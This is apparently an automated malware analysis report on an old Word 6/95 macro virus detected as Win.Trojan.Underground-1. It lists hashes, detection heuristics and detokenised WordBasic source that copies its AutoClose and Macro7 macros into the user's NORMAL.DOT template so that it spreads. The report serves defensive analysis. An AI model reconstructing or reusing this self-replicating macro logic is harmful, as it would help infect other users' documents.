Win.Trojan.Underground-1 Office (OLE) malware analysis — malicious · a8bdc016a728118b

MALICIOUS

Office (OLE)

8.0 KB First seen: 2012-06-14

MD5: 5183836d786dfa0877158059c58fea40 SHA-1: 4abbbd655560dbbf0000765264e8b5712cbfed2f SHA-256: a8bdc016a728118b351ca1c5a1c5f9fb3a0e5e5df0f6c2b79298c482c33b45e3

102 Risk Score

Malware Insights

Win.Trojan.Underground-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic

This file exhibits characteristics of a legacy WordBasic macro virus, specifically identified by the 'RSN MACRO VIRUS' marker and the explicit attempt to install itself into the user's NORMAL.DOT template. The ClamAV detection further confirms its malicious nature, classifying it as Win.Trojan.Underground-1. The document body contains numerous strings related to macro execution and file infection.

Heuristics 3

ClamAV: Win.Trojan.Underground-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Underground-1
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE

The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 2370 bytes

Filename	Kind	Source	Size
`wordbasic_macros.txt`	wordbasic-macro	analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)	2370 bytes
SHA-256: `b6684b8679557dd5cc1ddd0d9b2c269be42c21d0b41256807f4012d804cf7f31`
Preview script First 1,000 lines of the extracted script = 29551 MAIN @cmd809e dlg @cmd0056 @cmd0209 @cmdc001 1 , 1 @cmd8081 @cmd8111 0 NeedName$ = "AutoClose" count = 1 @cmd80b7 0 @cmd80b8 count , 0 = NeedName$ * finish count action = @cmd802b "Can I install myself into your NORMAL.DOT" , "SoftWare UnderGround" , 4 action 0 path$ = @cmd8025 A$ = REM empty line B$ = count = 1 @cmd80b7 1 currentname$ = @cmd80b8 count , 1 @cmd80be currentname$ "LQMacro7" A$ = "MacroCopy" = @cmd8005 34 = path$ = ":" = currentname$ = @cmd8005 34 = "," = @cmd8005 34 = @cmd818c 2 = "\normal:Macro7" = @cmd8005 34 "LQAutoClose" B$ = "MacroCopy" = @cmd8005 34 = path$ = ":" = currentname$ = @cmd8005 34 = "," = @cmd8005 34 = @cmd818c 2 = "\normal:AutoClose" = @cmd8005 34 count @cmd00d7 = "Temp" , @cmdc001 1 , 1 @cmd8012 A$ @cmd8012 @cmd8005 11 = @cmd8005 13 = B$ @cmd8012 @cmd8005 11 = @cmd8005 13 = "DocClose 2" @cmd00d7 = "Temp" , dlg author$ = dlg author$ = author$ = "Unknown User" @cmd802b "This doc was created by " = author$ = " at " = dlg = @cmd8005 13 = "saved before now " = dlg 1792 " times, last saving by " = dlg = @cmd8005 13 = dlg = " characters, " = dlg = " words, " = dlg = " lines, " = dlg = " pages" , "SoftWare UnderGround" , 0 Empty MAIN @cmd809e @cmd8111 0 @cmd0054 = 1 cntm = @cmd80b7 1 present = 0 cntm 0 count = 1 cntm name$ = @cmd80b8 count , 1 @cmd80be name$ "LQMacro7" cn1$ = name$ present = present = 1 "LQAutoClose" cn2$ = name$ present = present = 2 count Macro7 present = 3 * form path$ = @cmd8025 A$ = B$ = present = 1 present = 0 REM AutoClose not found namecl$ = "AutoClose" = @cmd8005 34 cn2$ = @cmd8005 65 = @cmd80ff @cmd80f7 23 = 3 = @cmd80ea @cmd8007 @cmd80ff @cmd80f7 = @cmd80f5 @cmd80f7 B$ = "MacroCopy " = @cmd8005 34 = @cmd818c 2 = "\normal:" = namecl$ = "," = @cmd8005 34 = path$ = ":" = cn2$ = @cmd8005 34 = ",1" present = 2 present = 0 REM Macro7 not found namevm$ = "Macro7" = @cmd8005 34 cn1$ = @cmd8005 65 = @cmd80f4 @cmd80f7 = @cmd80ea @cmd8007 @cmd80f4 @cmd80f7 = @cmd80f5 @cmd80f7 A$ = "MacroCopy " = @cmd8005 34 = @cmd818c 2 = "\normal:" = namevm$ = "," = @cmd8005 34 = path$ = ":" = cn1$ = @cmd8005 34 = ",1" @cmd00d7 = "Temp" , @cmd8012 A$ @cmd8012 @cmd8005 11 = @cmd8005 13 = B$ @cmd8012 @cmd8005 11 = @cmd8005 13 = "DocClose 2" @cmd00d7 = "Temp" , @cmdc010 @cmd015d @cmd0161 = cn1$ , = , = 1 , = "Text1" , = 0 , = "1" , = , = , = 0 , = 0 , = , = 0 , = @cmd01f7 = , = 0 , = 2 @cmd0053

SHA-256: b6684b8679557dd5cc1ddd0d9b2c269be42c21d0b41256807f4012d804cf7f31

Preview script

First 1,000 lines of the extracted script

= 29551
MAIN
@cmd809e
dlg @cmd0056
@cmd0209
@cmdc001 1 , 1
@cmd8081
@cmd8111 0
NeedName$ = "AutoClose"
count = 1 @cmd80b7 0
@cmd80b8 count , 0 = NeedName$ * finish
count
action = @cmd802b "Can I install myself into your NORMAL.DOT" ,
"SoftWare UnderGround" , 4
action 0
path$ = @cmd8025
A$ = REM  empty line
B$ =
count = 1 @cmd80b7 1
currentname$ = @cmd80b8 count , 1
@cmd80be currentname$
"LQMacro7"
A$ = "MacroCopy" = @cmd8005 34 = path$ = ":" = currentname$ = @cmd8005 34 = "," =
@cmd8005 34 = @cmd818c 2 = "\normal:Macro7" = @cmd8005 34
"LQAutoClose"
B$ = "MacroCopy" = @cmd8005 34 = path$ = ":" = currentname$ = @cmd8005 34 = "," =
@cmd8005 34 = @cmd818c 2 = "\normal:AutoClose" = @cmd8005 34
count
@cmd00d7 = "Temp" ,
@cmdc001 1 , 1
@cmd8012 A$
@cmd8012 @cmd8005 11 = @cmd8005 13 = B$
@cmd8012 @cmd8005 11 = @cmd8005 13 = "DocClose 2"
@cmd00d7 = "Temp" ,
dlg
author$ = dlg
author$ = author$ = "Unknown User"
@cmd802b "This doc was created by " = author$ = " at " = dlg = @cmd8005 13 =
"saved before now " = dlg 1792 " times, last saving by " = dlg = @cmd8005 13 = dlg = " characters, " = dlg =
" words, " = dlg = " lines, " = dlg = " pages" ,
"SoftWare UnderGround" , 0
Empty
MAIN
@cmd809e
@cmd8111 0
@cmd0054 = 1
cntm = @cmd80b7 1
present = 0
cntm 0
count = 1 cntm
name$ = @cmd80b8 count , 1
@cmd80be name$
"LQMacro7"
cn1$ = name$
present = present = 1
"LQAutoClose"
cn2$ = name$
present = present = 2
count
Macro7
present = 3 * form
path$ = @cmd8025
A$ =
B$ =
present = 1 present = 0 REM  AutoClose not found
namecl$ = "AutoClose" = @cmd8005 34
cn2$ = @cmd8005 65 = @cmd80ff @cmd80f7 23 = 3 = @cmd80ea @cmd8007 @cmd80ff @cmd80f7 = @cmd80f5 @cmd80f7
B$ = "MacroCopy " = @cmd8005 34 = @cmd818c 2 = "\normal:" = namecl$ = "," = @cmd8005 34 =
path$ = ":" = cn2$ = @cmd8005 34 = ",1"
present = 2 present = 0 REM  Macro7 not found
namevm$ = "Macro7" = @cmd8005 34
cn1$ = @cmd8005 65 = @cmd80f4 @cmd80f7 = @cmd80ea @cmd8007 @cmd80f4 @cmd80f7 = @cmd80f5 @cmd80f7
A$ = "MacroCopy " = @cmd8005 34 = @cmd818c 2 = "\normal:" = namevm$ = "," =
@cmd8005 34 = path$ = ":" = cn1$ = @cmd8005 34 = ",1"
@cmd00d7 = "Temp" ,
@cmd8012 A$
@cmd8012 @cmd8005 11 = @cmd8005 13 = B$
@cmd8012 @cmd8005 11 = @cmd8005 13 = "DocClose 2"
@cmd00d7 = "Temp" ,
@cmdc010
@cmd015d
@cmd0161 = cn1$ , = , = 1 , = "Text1" ,
= 0 , = "1" , = , = , = 0 ,
= 0 , = , = 0 , =
@cmd01f7 = , = 0 , = 2
@cmd0053

Open this report in the interactive analyzer, or submit your own file for analysis.